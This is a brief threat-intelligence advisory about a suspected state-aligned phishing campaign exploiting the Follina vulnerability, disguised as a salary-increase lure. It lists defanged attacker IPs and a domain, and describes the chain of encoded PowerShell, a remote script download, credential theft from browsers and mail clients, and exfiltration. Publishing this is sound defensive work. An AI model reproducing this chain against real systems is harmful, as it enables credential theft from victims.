Follina suspected state aligned phishing campaign

June 13, 2022

This campaign masqueraded as a salary increase and utilized an RTF with the exploit payload downloaded from 45.76.53[.]253. The downloaded Powershell script was base64 encoded and used Invoke-Expression to download an additional PS script from seller-notification[.]live. This script checks for virtualization, steals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil to 45.77.156[.]179.
Subscribe